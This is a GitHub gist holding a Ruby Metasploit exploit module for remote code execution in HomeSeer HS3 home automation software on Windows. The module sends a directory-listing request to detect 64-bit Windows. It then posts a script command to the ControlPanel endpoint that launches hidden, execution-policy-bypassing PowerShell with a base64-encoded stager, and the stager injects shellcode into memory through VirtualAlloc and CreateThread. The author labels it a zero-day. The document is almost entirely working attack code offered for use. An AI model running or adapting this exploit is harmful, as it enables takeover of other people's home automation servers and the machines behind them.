Created
March 17, 2014 19:58
-
-
Save phikshun/9606994 to your computer and use it in GitHub Desktop.
HomeSeer HS3 Code Execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = AverageRanking | |
include Msf::Exploit::Remote::HttpClient | |
def initialize(info = {}) | |
super(update_info(info, | |
'Name' => 'HomeSeer Code Execution Vulnerability', | |
'Description' => %q{ | |
This exploit abuses a file upload issue and directory traversal in order | |
to obtain code execution in HomeSeer HS3. | |
}, | |
'Author' => [ 'phikshun' ], | |
'License' => MSF_LICENSE, | |
'Version' => '$Revision: 14774 $', | |
'References' => | |
[ | |
[ 'NA', 'NA' ], | |
], | |
'DefaultOptions' => | |
{ | |
}, | |
'Platform' => 'win', | |
'Targets' => | |
[ | |
[ 'Windows 7/8 x86/x64', { 'Arch' => ARCH_X86 } ], | |
], | |
'Privileged' => false, | |
'DefaultTarget' => 0, | |
'DisclosureDate' => '0 day, yo')) | |
end | |
def check_x64 | |
print_status('Checking windows version') | |
res = send_request_cgi( | |
{ | |
'uri' => '/status', | |
'method' => 'POST', | |
'data' => "dir=\\" | |
}) | |
if res.body =~ /Program Files \(x86\)/ | |
print_status('Found 64-bit Windows') | |
return true | |
else | |
print_status('Found 32-bit Windows') | |
return false | |
end | |
end | |
def launch_shell(shell) | |
shell = Rex::Text.uri_encode(shell) | |
post_params = "devlist=&scriptcmd=#{shell}&id=runscript_ID598385&runscript=Submit" | |
print_status('Uploading shell') | |
res = send_request_cgi( | |
{ | |
'uri' => '/ControlPanel', | |
'method' => 'POST', | |
'data' => post_params | |
}) | |
end | |
def exploit | |
print_status('Building powershell stager') | |
# Create powershell script that will inject shell code from the selected payload | |
ps = "$code = @\" | |
[DllImport(\"kernel32.dll\")] | |
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
[DllImport(\"kernel32.dll\")] | |
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
[DllImport(\"msvcrt.dll\")] | |
public static extern IntPtr memset(IntPtr dest, uint src, uint count); | |
\"@ | |
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru | |
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')} | |
$size = 0x1000 | |
if ($sc.Length -gt 0x1000) {$size = $sc.Length} | |
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) | |
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} | |
$winFunc::CreateThread(0,0,$x,0,0,0)" | |
# Unicode encode powershell script | |
ps_uni = Rex::Text.to_unicode(ps) | |
# Base64 encode unicode | |
ps_b64 = Rex::Text.encode_base64(ps_uni) | |
# Final arguments for powershell | |
args = "-w hidden -nop -ep bypass -noexit -encodedCommand #{ps_b64}" | |
if check_x64 | |
psh = "c:\\\\windows\\\\syswow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe" | |
else | |
psh = "c:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe" | |
end | |
script = "&hs.Launch \"#{psh}\", \"#{args}\", \"\", 0" | |
launch_shell(script) | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment